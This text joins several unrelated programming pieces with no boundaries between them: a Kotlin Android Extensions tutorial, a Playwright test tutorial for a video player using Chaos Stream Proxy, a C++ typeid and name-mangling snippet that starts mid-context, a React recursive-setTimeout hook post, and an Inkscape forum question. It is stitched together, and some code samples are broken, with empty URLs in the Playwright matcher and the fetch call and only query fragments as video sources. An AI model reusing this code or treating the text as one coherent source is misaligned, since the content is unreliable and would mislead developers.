The @Parcelize annotation saves you from having to write all the boilerplate code related to implementing the Parcelable interface.

Note: This tutorial assumes you have previous experience with developing for Android in Kotlin. If you are unfamiliar with the language, have a look at this tutorial. If you're beginning with Android, check out some of our Getting Started and other Android tutorials.

Getting started

The project you'll be working with, YANA (Yet Another Notepad App), is an app to write notes. Use the Download Materials button at the top or bottom of this tutorial to download the starter project. Once downloaded, open the starter project in Android Studio 3.0.1 or greater, and give it a build and run. Tap the floating action button to add a note, and tap the back button to save a note into your list.

Taking a look at the project, you see that it consists of two activities:

- NoteListActivity.kt: The main activity that lists all your existing notes and lets you create or edit one.
- NoteDetailActivity.kt: This will show an existing note and also can handle a new note.

Setting up Kotlin Android Extensions

Open the build.gradle file for the app module and add the following, just below the 'kotlin-android' plugin:

apply plugin: 'kotlin-android-extensions'

That's all the setup you need to use the plugin! Now you're ready to start using the extensions.

Note: If you create a new Android app with Kotlin support from scratch, you'll see that the plugin is already included in the app build.gradle file.

View binding

Open NoteListActivity, and remove the following lines from the onCreate method:

val noteListView: RecyclerView = findViewById(R.id.noteListView)
val addNoteView: View = findViewById(R.id.addNoteView)

Android Studio should notice that it's missing imports for your two views. You can hit Option-Return on macOS or Alt-Enter on PC to pull in the imports. Make sure to choose the import that starts with kotlinx to use the extensions.
If you check the imports at the top of the file now, you should see the following:

import kotlinx.android.synthetic.main.activity_note_list.*

In order to generate the synthetic properties to reference the views of the layout, you need to import kotlinx.android.synthetic.main.<layout>.*. In this case, the layout is activity_note_list. The asterisk wild-card at the end means that all possible views will be pulled in from the file. You can also import views individually if you wish, by replacing the asterisk with the view name.

Your onCreate() method should now look like this:

override fun onCreate(savedInstanceState: Bundle?) {
  super.onCreate(savedInstanceState)
  setContentView(R.layout.activity_note_list)

  noteRepository = ...
  adapter = ...

  // 1
  noteListView.adapter = adapter
  // 2
  addNoteView.setOnClickListener { addNote() }
}

1. To reference the list that shows notes, check the id in the activity_note_list.xml file; you'll find that it's noteListView. So, you access it using noteListView.
2. The floating action button has the id addNoteView, so you reference it using addNoteView.

It's important to note here that your synthetic view reference has the same name as the id you used in the layout file. Many teams have their own naming conventions for XML identifiers, so you may need to update your convention if you want to stick to camel case on the view references in your code.

Next, open NoteDetailActivity and remove the following view properties:

private lateinit var editNoteView: EditText
private lateinit var lowPriorityView: View
private lateinit var normalPriorityView: View
private lateinit var highPriorityView: View
private lateinit var urgentPriorityView: View
private lateinit var noteCardView: CardView

Also, remove the findViewById calls in onCreate(). The project will not compile at this point because of all those undeclared views.
However, if you take a look at the view ids in activity_note_detail.xml and note_priorities_chooser_view.xml, you'll notice they match the undeclared views you have in the activity. Add the following imports to the top of the file:

import kotlinx.android.synthetic.main.activity_note_detail.*
import kotlinx.android.synthetic.main.note_priorities_chooser_view.*

Now the project should compile again :]

Finally, do the same with NoteListAdapter, and remove the following in NoteViewHolder:

private val noteTextView: TextView = itemView.findViewById(R.id.noteTextView)
private val noteDateView: TextView = itemView.findViewById(R.id.noteDateView)
private val noteCardView: CardView = itemView.findViewById(R.id.noteCardView)

Add the following import to the file:

import kotlinx.android.synthetic.main.note_item.view.*

Note: In a view you have to import kotlinx.android.synthetic.main.<layout>.view.*

And then prepend each referenced view with itemView, like so:

fun bind(note: Note, listener: Listener) {
  itemView.noteTextView.text = note.text
  itemView.noteCardView.setCardBackgroundColor(
      ContextCompat.getColor(itemView.noteCardView.context, note.getPriorityColor()))
  itemView.noteCardView.setOnClickListener { listener.onNoteClick(itemView.noteCardView, note) }
  itemView.noteDateView.text = sdf.format(Date(note.lastModifed))
}

Build and run the app, and you'll see that everything is working like before, and you've removed all the findViewById() boilerplate. :]

View binding under the hood

I bet you're curious about how this "magic" works. Fortunately, there is a tool to decompile the code! Open NoteListActivity and go to Tools > Kotlin > Show Kotlin Bytecode and then press the Decompile button.
You'll find the following method, generated by the plugin:

public View _$_findCachedViewById(int var1) {
  if(this._$_findViewCache == null) {
    this._$_findViewCache = new HashMap();
  }

  View var2 = (View)this._$_findViewCache.get(Integer.valueOf(var1));
  if(var2 == null) {
    var2 = this.findViewById(var1);
    this._$_findViewCache.put(Integer.valueOf(var1), var2);
  }

  return var2;
}

Now check that this method is called whenever you reference a view, by right-clicking on it and selecting Find Usages. One example usage is:

RecyclerView var10000 = (RecyclerView)this._$_findCachedViewById(id.noteListView);

_$_findCachedViewById() creates a view cache HashMap, tries to find the cached view, and, if it doesn't find it, calls good old findViewById() and saves the result to the cache map. Pretty cool, right? :]

Note: You'll see that a _$_clearFindViewByIdCache method was also generated, but the Activity doesn't call it. This method is only needed when using Fragments, as the Fragment's onDestroyView() calls it.

Check what the plugin does with the adapter. Open NoteListAdapter and decompile it. To your surprise, you won't find the _$_findCachedViewById method. Instead, you'll find that each time the bind() method is called, findViewById() is called. This leads to a performance problem (because it will always have to find the views through the hierarchy), the exact problem that a ViewHolder should solve. So, this is not following the ViewHolder pattern! To avoid this, you could work around it with the following approach:

class NoteViewHolder(itemView: View) : RecyclerView.ViewHolder(itemView) {

  private val noteTextView = itemView.noteTextView
  private val noteCardView = itemView.noteCardView
  private val noteDateView = itemView.noteDateView

  private val sdf = SimpleDateFormat("yyyy-MM-dd HH:mm", Locale.getDefault())

  fun bind(note: Note, listener: Listener) {
    noteTextView.text = note.text
    noteCardView.setCardBackgroundColor(
        ContextCompat.getColor(noteCardView.context, note.getPriorityColor()))
    noteCardView.setOnClickListener { listener.onNoteClick(noteCardView, note) }
    noteDateView.text = sdf.format(Date(note.lastModifed))
  }
}

Now, if you decompile, you'll see that findViewById() is only called when the NoteViewHolder is created, so you're safe again!
However, there is another approach: you can use the LayoutContainer interface, which will be covered in the following section.

Experimental features

Certain features of the Kotlin Android Extensions have not yet been deemed production ready, and are considered experimental features. These include the LayoutContainer interface and the @Parcelize annotation. To enable the experimental features, open the app module build.gradle file again and add the following, just below the 'kotlin-android-extensions' plugin:

androidExtensions {
  experimental = true
}

LayoutContainer

As you've seen, it's easy to access views with synthetic properties by using the corresponding kotlinx imports. This applies to both activities and fragments. But, in the case of a ViewHolder (or any class that has a container view), you can implement the LayoutContainer interface to avoid workarounds like the one you used before. Open NoteListAdapter again and implement the LayoutContainer interface:

// 1
import kotlinx.android.extensions.LayoutContainer
// 2
import kotlinx.android.synthetic.main.note_item.*
...
// 3
class NoteViewHolder(override val containerView: View) :
    RecyclerView.ViewHolder(containerView), LayoutContainer {

  private val sdf = SimpleDateFormat("yyyy-MM-dd HH:mm", Locale.getDefault())

  fun bind(note: Note, listener: Listener) {
    // 4
    noteTextView.text = note.text
    noteCardView.setCardBackgroundColor(
        ContextCompat.getColor(noteCardView.context, note.getPriorityColor()))
    noteCardView.setOnClickListener { listener.onNoteClick(noteCardView, note) }
    noteDateView.text = sdf.format(Date(note.lastModifed))
  }
}

1. Import the LayoutContainer interface.
2. To reference the views of the note_item.xml layout using LayoutContainer, you need to import kotlinx.android.synthetic.main.note_item.*
3. Add the interface to NoteViewHolder. To comply with it, you provide a containerView property override in the primary constructor, which then gets passed along to the superclass.
4. Finally, use the properties that reference the views of the layout.

If you decompile this code, you'll see that it uses _$_findCachedViewById() to access the views. Build and run the app to see it working just like before, this time with LayoutContainer.
View caching strategy

You've seen that _$_findCachedViewById uses a HashMap by default. The map uses an integer for the key and a view object for the value. You could use a SparseArray for the storage instead. If you prefer using a SparseArray, you can annotate the Activity/Fragment/ViewHolder with:

@ContainerOptions(cache = CacheImplementation.SPARSE_ARRAY)

If you want to disable the cache, the annotation is:

@ContainerOptions(cache = CacheImplementation.NO_CACHE)

It's also possible to set a module-level caching strategy by setting the defaultCacheImplementation value in the androidExtensions block in the build.gradle file.

@Parcelize

Implementing the Parcelable interface on a custom class allows you to add instances of the class to a parcel, for example, adding them into a Bundle to pass between Android components. There is a fair amount of boilerplate needed to implement Parcelable. Libraries like AutoValue have been created to help with that boilerplate. The Kotlin Android Extensions have their own way to help you implement Parcelable, using the @Parcelize annotation. Open the Note class and modify it to the following:

@Parcelize
data class Note(var text: String,
                var priority: Int = 0,
                var lastModifed: Long = Date().time,
                val id: String = UUID.randomUUID().toString()) : Parcelable

You've removed literally all the code in the body of the class, and replaced it with the single annotation.

Note: Android Studio may highlight the class thinking there's a compile error. But this is a known bug, and here is the issue. Fear not, you can build and run the project without any problems.

Build and run the app, and all is working as before. Implementing Parcelable is just that simple! Imagine how much time this will save you. :]

Where To Go From Here?

Congratulations! You've just learned the Kotlin Android Extensions, and seen how they let you remove a ton of boilerplate code from your project.
You can download the final version of the project using the Download Materials button at the top or bottom of this tutorial. Here are some great references to learn more about the development of Kotlin Android Extensions:

- Official docs: you can have a look at them here.
- Kotlin Evolution and Enhancement Process: these are ideas and proposals that may go into future Kotlin releases, also called KEEPs. For example, the @Parcelize annotation, the view caching strategy and the LayoutContainer interface have their own KEEPs.
- If you liked decompiling the code and checking what's under the hood, then I recommend you watch Exploring Java hidden costs by Jake Wharton.

Finally, as a separate project from the Kotlin Android Extensions, Google has released Android KTX. KTX is not a plugin, but instead another set of extensions to ease Android development. KTX simplifies working with strings, SharedPreferences, and other parts of Android. Feel free to share your feedback, findings or ask any questions in the comments below or in the forums. I hope you enjoyed this tutorial on the Kotlin Android Extensions!
Testing the behavior of a video player when there is something wrong with the video source used to be a tedious task: you had to either manually create or hunt down different broken streams to test different errors, and even then you couldn't always know for sure that the same error would always occur with the same timing.

To address this problem, Eyevinn has released its Chaos Stream Proxy as open source! As the name suggests, this is a very handy tool for proxying an adaptive bitrate stream and deterministically introducing corruptions to it. This tutorial will demonstrate how to use the Proxy in the end-to-end testing of the open-source Eyevinn WebPlayer, using Playwright.

Using the Chaos Stream Proxy

A demo of the Chaos Stream Proxy, which we'll use for the purpose of this tutorial, is currently running here. The Proxy supports both HLS and MPEG-DASH streaming formats, and easily lets us add different corruptions by adding a stringified JSON object as a query parameter to the proxied URL. If we take this HLS URL: it can be played with no problems, for example in the Eyevinn WebPlayer, hosted here. But, if we proxy it through the Chaos Stream Proxy and add the query parameter statusCode=[{i:*,code:404}], we'll instead get 404 errors for all segments (because we set i:*; it's also possible to specify individual segments). For specifying other types of corruptions, check out the project's README.

EPAS and the Eyevinn WebPlayer

The Eyevinn WebPlayer implements the Eyevinn Player Analytics Specification (EPAS), which is an open specification that defines a standard for implementing analytics in any video/audio player. This means that we have a format for event reporting that we expect the WebPlayer to follow. User interactions are easy enough to create for the sake of validating the EPAS implementation, and thanks to the Chaos Stream Proxy, manifest-related errors are now also a piece of cake!
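Building such a URL is just string concatenation on the query string. A tiny helper makes the shape concrete; note that the helper itself is hypothetical (not part of the Chaos Stream Proxy), and the base URL below is a placeholder:

```javascript
// Hypothetical helper: append a Chaos Stream Proxy corruption spec to an
// already-proxied manifest URL. i:* targets every segment; a number (i:5)
// targets a single one.
function corruptAllSegments(proxiedUrl, code) {
  return `${proxiedUrl}&statusCode=[{i:*,code:${code}}]`;
}

const url = corruptAllSegments("https://proxy.example/api/proxy?url=manifest.m3u8", 404);
console.log(url);
// https://proxy.example/api/proxy?url=manifest.m3u8&statusCode=[{i:*,code:404}]
```

The same pattern applies to the Proxy's other corruption parameters, since they are all passed as query-string values.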
Setting up Playwright

Playwright is a powerful end-to-end test runner, which we're using to automatically test our code in a real browser environment. At the time of writing, we're adding a dependency for "@playwright/test": "^1.19.2" in our package.json (this is a Node.js project). We also add the script "test:e2e": "playwright test". Our playwright.config.ts is in the project root, and looks like this:

import { PlaywrightTestConfig, devices } from '@playwright/test';

const config: PlaywrightTestConfig = {
  forbidOnly: !!process.env.CI,
  retries: process.env.CI ? 2 : 0,
  testDir: "tests/",
  workers: 3,
  use: {
    trace: 'on-first-retry',
    // Necessary to get the media codecs to play video (default 'chromium' doesn't have them)
    channel: 'chrome'
  },
  webServer: {
    command: 'npm run examples',
    port: 1234,
    reuseExistingServer: !process.env.CI,
  },
  projects: [
    {
      name: 'chromium',
      use: { ...devices['Desktop Chrome'] },
    },
  ],
};

export default config;

testDir points to the folder where we put our test .spec.ts files; examples in the npm run examples command is a folder in our root directory, in which we put the HTML files that Playwright will use. Note that channel: 'chrome' is necessary for our tests to run; the default setting is chromium, which doesn't include the necessary media codecs for video playback. This may cause issues with automated workflows and running tests on Firefox and WebKit, but works locally in Chrome.
In our examples folder, we add an index.html file that includes a link to our Chaos Stream Proxy HTML:

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>Examples</title>
</head>
<body>
  <a href="chaos-proxy/index.html">Chaos Stream Proxy Example</a>
</body>
</html>

As well as the Chaos Stream Proxy index.html file in the sub-folder chaos-proxy:

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>Chaos Stream Proxy Example</title>
  <script async></script>
</head>
<body>
  <!-- VOD: With segment delay of 1500ms and response code 400 on sixth (response of 400 will be sent after 1500ms): -->
  <eyevinn-video
    source="[{i:5,ms:1500}]&statusCode=[{i:5,code:400}]"
    muted autoplay>
  </eyevinn-video>

  <!-- VOD: With response of status code 404 on all segments: -->
  <eyevinn-video
    source="[{i:*,code:404}]"
    muted autoplay>
  </eyevinn-video>
</body>
</html>

This file imports the compiled version of the Eyevinn WebPlayer Component from the repository, which lets us embed the WebPlayer as web components with the <eyevinn-video> tags.

In our tests folder, we add chaos-proxy.spec.ts, which will be run automatically when we run the npm run test:e2e script:

import { test } from '@playwright/test';

test('player sends error events when loading corrupt streams', async ({ page }) => {
  const [request] = await Promise.all([
    page.goto('/chaos-proxy/index.html'),
    page.waitForRequest(req =>
      req.url().match('') &&
      req.method() === 'POST' &&
      req.postDataJSON().event === "warning" &&
      req.postDataJSON().payload.code === "400"),
    page.waitForRequest(req =>
      req.url().match('') &&
      req.method() === 'POST' &&
      req.postDataJSON().event === "warning" &&
      req.postDataJSON().payload.code === "404"),
  ]);
});

We make asynchronous calls to the goto and waitForRequest methods, available on the page object. We check that the POST requests conform to the expected format: if both matching requests are made within 30 seconds, the test passes!
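The matcher logic inside waitForRequest can also be pulled out into a small predicate and exercised against a stubbed request, without launching a browser. This is only a sketch: the helper name and the stub are ours, and the payload shape simply mirrors the test above:

```javascript
// Hypothetical predicate: does this request look like an EPAS "warning"
// event with the given error code? Mirrors the waitForRequest matcher.
function isWarningWithCode(req, code) {
  if (req.method() !== "POST") return false;
  const body = req.postDataJSON();
  return body.event === "warning" && body.payload.code === code;
}

// A minimal stub standing in for Playwright's Request object:
const fakeRequest = {
  method: () => "POST",
  postDataJSON: () => ({ event: "warning", payload: { code: "404" } }),
};
console.log(isWarningWithCode(fakeRequest, "404")); // true
console.log(isWarningWithCode(fakeRequest, "400")); // false
```

Factoring the predicate out this way also keeps the Playwright test readable when more event types are added.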
We run the test with npm run test:e2e, and this should be the result: Success!

Bonus: Playwright Test for VS Code and debug mode

Playwright is developed by Microsoft, so perhaps it shouldn't come as a surprise that there is an excellent VS Code extension available. With this extension, it's a breeze to run individual tests in isolation, add breakpoints and more! It also gives easy access to debug mode, which lets us view and interact with the test in the test runner browser.
To illustrate this, let's use the code below, which uses the typeid operator to determine a data type at runtime, a C++ mechanism called Run-Time Type Information (RTTI).

#include <iostream>
#include <typeinfo>

using namespace std;

int main()
{
    unsigned int x = 10;
    unsigned y = 20;

    cout << typeid(x).name() << endl;
    cout << typeid(y).name() << endl;
}

Compile and run the code. Observe that the output shows two js. Why? Because in GCC, the returned name is a decorated name (it has been mangled), and we need to demangle it.

$ g++ typeid.cc -o typeid
$ ./typeid
j
j

To demangle the name, use the c++filt program; the result is shown below. Now, the question is: why was the name mangled in the first place? C++ supports function overloading, a feature where you can define two or more functions/methods with the same name but different parameters, so conversion to assembly code needs a unique assembler name for each of these functions. This is where the process of mangling comes in. The c++filt tool reverses the process to recover the original name.

$ ./typeid | c++filt -t
unsigned int
unsigned int

Lots of new things learned here, but most importantly: always double-check (google, in this sense) any assumed knowledge before you share it with someone else.
I'm working on a project at the moment where I need to be able to poll an API periodically, and I'm building the application using React. I hadn't had a chance to play with React Hooks yet, so I took this as an opportunity to learn a bit about them and see how to solve something that I would normally have done with class-based components and state, but do it with Hooks.

When I was getting started I kept hitting problems: either the Hook wasn't updating state, or it was being overly aggressive in setting up timers, to the point where I'd have dozens running at the same time. After doing some research I came across a post by Dan Abramov on how to implement a Hook to work with setInterval. Dan does a great job of explaining the approach that needs to be taken and the reasons for particular approaches, so go ahead and read it before continuing on in my post, as I won't do it justice.

Initially I started using this Hook from Dan, as it did what I needed to do. Unfortunately, I found that the API I was hitting had an inconsistency in response time, which resulted in an explosion of concurrent requests, and I was thrashing the server. Not a good idea! But this was to be expected using setInterval: it doesn't wait until the last response has completed before starting another interval timer. Instead, I should be using setTimeout in a recursive way, like so:

const callback = () => {
  console.log("I was called!");
  setTimeout(callback, 1000);
};
callback();

In this example the console is written to approximately once every second, but if for some reason the callback took longer than that to complete (say, you were stopped on a breakpoint), a new timer isn't started until it finishes, meaning there'll only ever be one pending invocation. This is a much better way to do polling than using setInterval.
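Extending this pattern to asynchronous callbacks just means waiting for the returned Promise before queueing the next tick. A plain-JavaScript sketch (the function name and the injected timer parameter are mine, purely so the sketch is easy to exercise):

```javascript
// Sketch: recursive setTimeout that waits for async callbacks to finish.
function scheduleRecursive(callback, delay, setTimer = setTimeout) {
  function tick() {
    const ret = callback();
    if (ret instanceof Promise) {
      // Async callback: queue the next tick only once the Promise settles.
      ret.then(() => setTimer(tick, delay));
    } else {
      // Sync callback: queue the next tick straight away.
      setTimer(tick, delay);
    }
  }
  setTimer(tick, delay);
}

// Exercise it with a fake timer that fires immediately, at most three times:
let fired = 0;
scheduleRecursive(() => {}, 1000, (fn) => { if (fired < 3) { fired++; fn(); } });
console.log(fired); // 3
```

Because the next timer is only created inside tick, there is never more than one pending invocation, no matter how long the callback takes.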
Implementing Recursive setTimeout with React Hooks

With React, I've created a custom hook like Dan's useInterval:

import React, { useEffect, useRef } from "react";

function useRecursiveTimeout<T>(
  callback: (() => Promise<T>) | (() => void),
  delay: number | null
) {
  const savedCallback = useRef(callback);

  // Remember the latest callback.
  useEffect(() => {
    savedCallback.current = callback;
  }, [callback]);

  // Set up the timeout loop.
  useEffect(() => {
    let id: NodeJS.Timeout;
    function tick() {
      const ret = savedCallback.current();

      if (ret instanceof Promise) {
        ret.then(() => {
          if (delay !== null) {
            id = setTimeout(tick, delay);
          }
        });
      } else {
        if (delay !== null) {
          id = setTimeout(tick, delay);
        }
      }
    }
    if (delay !== null) {
      id = setTimeout(tick, delay);
      return () => id && clearTimeout(id);
    }
  }, [delay]);
}

export default useRecursiveTimeout;

The way this works is that the tick function invokes the callback provided (which is the function to call recursively) and then schedules the next run with setTimeout. Once the callback completes, the return value is checked to see if it is a Promise, and if it is, the next iteration is only scheduled once the Promise completes; otherwise it is scheduled immediately. This means that it can be used in both a synchronous and an asynchronous manner:

useRecursiveTimeout(() => {
  console.log("I was called recursively, and synchronously");
}, 1000);

useRecursiveTimeout(async () => {
  await fetch("");
  console.log("Fetch called!");
}, 1000);

Here's a demo:

Conclusion

Hooks are pretty cool, but it can be a bit trickier to integrate them with some APIs in JavaScript, such as working with timers. Hopefully this example with setTimeout is useful for you. Feel free to copy the code or put it on npm yourself.
A few days ago I compiled Inkscape from source, and it seemed to work just fine (even better than the standard install here on my Arch Linux system; for some reason it starts up much faster now!). However, I just noticed that some extensions using "inkex.py" have a problem, namely:

Traceback (most recent call last):
  File "rtree.py", line 19, in <module>
    import inkex, simplestyle, pturtle, random
  File "/usr/local/share/inkscape/extensions/inkex.py", line 57
    u'sodipodi' :u'',
              ^
SyntaxError: invalid syntax

I'm not entirely sure whether this is the right sub-forum to post this, but what's causing it? Did I forget to satisfy certain dependencies, should I have somehow changed the configuration file before compiling, did I overlook something...?

Thanks!